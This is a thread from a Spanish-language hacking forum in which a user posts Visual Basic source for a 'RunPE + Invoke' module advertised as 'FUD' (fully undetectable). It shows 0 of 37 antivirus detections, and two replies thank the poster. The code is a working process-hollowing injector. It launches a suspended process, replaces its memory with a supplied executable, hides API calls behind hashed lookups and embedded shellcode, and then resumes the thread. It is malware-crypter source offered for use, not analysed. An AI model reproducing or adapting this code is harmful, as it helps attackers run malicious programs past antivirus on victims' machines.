comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

RunPe + Invoke ( FUD) By M3

  • 2 Respuestas
  • 4406 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5336
  • Actividad:
    23.33%
  • Reputación 30
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Junio 01, 2012, 06:18:13 am »
Código: Visual Basic
  1. ' ===========================================================================================================================
  2. ' ===========================================================================================================================
  3. ' => Autor: M3
  4. ' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
  5. ' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
  6. ' => Detecciones : 0 | 37   (http://scanner.udtools.net/reporte.php?id=y4nu_SnKz)
  7. ' => Flecha : 13|05|2012
  8. ' => sHost : Ruta al exe
  9. ' => sBytes: Bytes a ejecutar
  10. ' ===========================================================================================================================
  11. ' ===========================================================================================================================
  12. Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
  13. Declare Function ExeThunk Lib "user32" Alias "CallWindowProcA" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
  14. Declare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef a As Any, Optional ByVal b As Long = 1, Optional ByVal c As Long = 1) As Long
  15. Private sVALUE                         As Byte
  16. Private sMEMORY(40)                    As Byte
  17. Private ASM_GETAPIPTR(170)             As Byte
  18. Private ASM_CALLCODE(255)              As Byte
  19. Private IMAGE_DOS_HEADER(65)           As Byte
  20. Private IMAGE_NT_HEADERS(256)          As Byte
  21. Private IMAGE_SECTION_HEADER(60)       As Byte
  22. Private PROCESS_INFORMATION(44)        As Byte
  23. Private tCONTEXT(210)                  As Byte
  24. Private STARTUPINFO(16)                As Long
  25. Private sParams                        As Long
  26. Private sImageBase                     As Long
  27. Private sProcess                       As Long
  28. Private sThread                        As Long
  29. Private SizeOfImage                    As Long
  30. Private SizeOfHeaders                  As Long
  31. Private sEntryPoint                    As Long
  32. Private sVirtualAddress                As Long
  33. Private sRawData                       As Long
  34. Private sRawDataPoint                  As Long
  35. Private sEbx                           As Long
  36. Private D                              As Long
  37. Private Y                              As Long
  38. Private vItem                          As Variant
  39. Private sSection                       As Integer
  40.  
  41.  
  42. Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
  43.  
  44.  
  45. For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
  46. &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)
  47.  
  48.  
  49. sMEMORY(Y) = vItem
  50.  
  51. Y = Y + 1
  52.  
  53. sVALUE = 200 + 48
  54.  
  55. Next
  56.  
  57.  
  58. Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
  59.  
  60. Call MoveMemory(sMulDiv(tCONTEXT(CLng("0"))), sMulDiv(&H10007), &H1 + &H4 + &H3)
  61.  
  62. Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(CLng("0"))), sMulDiv(sBytes(CLng("0"))), 72)
  63.  
  64. Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
  65.  
  66. Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(CLng("0"))), sMulDiv(sBytes(sParams)), 256)
  67.  
  68. Call MoveMemory(sMulDiv(sImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
  69.  
  70. Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
  71.  
  72. Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
  73.  
  74. Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
  75.  
  76. Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
  77.  
  78. Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(CLng("0"))), sMulDiv(PROCESS_INFORMATION(CLng("0"))))
  79.  
  80. Call MoveMemory(sMulDiv(sProcess), sMulDiv(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
  81.  
  82. Call MoveMemory(sMulDiv(sThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
  83.  
  84. Call Invoke("NTDLL", "NtUnmapViewOfSection", sProcess, sImageBase)
  85.  
  86. Call Invoke("KERNEL32", "VirtualAllocEx", sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
  87.  
  88. Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase, sMulDiv(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
  89.  
  90. For D = 0 To sSection - 1
  91.  
  92. Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(CLng("0"))), sMulDiv(sBytes(sParams + sVALUE + 40 * D)), &H40)
  93.  
  94. Call MoveMemory(sMulDiv(sVirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
  95.  
  96. Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
  97.  
  98. Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
  99.  
  100. Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase + sVirtualAddress, sMulDiv(sBytes(sRawData)), sRawDataPoint, CLng("0"))
  101.  
  102. Next
  103.  
  104. Call Invoke("NTDLL", "NtGetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
  105.  
  106. Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sEbx + &H4 + &H1 + &H3, sMulDiv(sVirtualAddress), &H1 + &H3 + &H2, CLng("0"))
  107.  
  108. Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(sImageBase + sEntryPoint), &H1 + &H3)
  109.  
  110. Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(tCONTEXT(176)), &H1 + &H3)
  111.  
  112. Call Invoke("NTDLL", "NtSetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
  113.  
  114. Call Invoke("NTDLL", "NtResumeThread", sThread, CLng("0"))
  115.  
  116. End Function
  117.  
  118.  
  119. Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
  120.    
  121.     ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
  122.    
  123. End Sub
  124.  
  125.  
  126.  
  127. Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
  128.  
  129. On Error Resume Next
  130. Dim vItem                       As Variant
  131. Dim sThunk                      As String
  132.  
  133. Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
  134.  
  135. For Each vItem In vParams
  136. sThunk = "68" & GetLng(vItem) & sThunk
  137. Next vItem
  138.  
  139. Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
  140. StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
  141.  
  142. Invoke = ExeThunk(VarPtr(ASM_CALLCODE(CLng("0"))))
  143.  
  144.  
  145. End Function
  146.  
  147. Private Function gHash(strHash) As Long
  148. On Error Resume Next
  149.  
  150. Dim i           As Long
  151. Dim lResult     As Long
  152.  
  153. For i = 1 To Len(strHash)
  154. lResult = CallThunk8(-439163333029263.6533@, lResult)
  155. lResult = lResult + Asc(Mid(strHash, i, 1))
  156. Next i
  157. gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)
  158.  
  159.  
  160. End Function
  161.  
  162. Private Function GetLng(ByVal lLng As Long) As String
  163. On Error Resume Next
  164. Dim lTMP                        As Long
  165. lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
  166. If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
  167. GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
  168. End Function
  169.  
  170. Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
  171. On Error Resume Next
  172. Dim i                           As Long
  173. For i = 0 To Len(sThunk) - 1 Step 2
  174. bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
  175. Next i
  176. End Sub
  177.  
  178. Function THUNK_GETAPIPTR() As String
  179. THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
  180. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
  181. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
  182. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
  183. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
  184. THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
  185. End Function
« Última modificación: Mayo 12, 2014, 03:34:28 pm por Expermicid »


Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #1 en: Junio 01, 2012, 07:52:39 am »
Increible aportaso! Gracias por traerlo
Saludos,, Cronos.-

Desconectado decoder79

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Junio 09, 2012, 01:06:02 pm »
Otro a la saca que me quedo. Gracias por aportarlo.

 

¿Te gustó el post? COMPARTILO!



Runpe Mod 2º

Iniciado por K4RUN4

Respuestas: 2
Vistas: 3873
Último mensaje Diciembre 10, 2012, 10:40:44 pm
por Snifer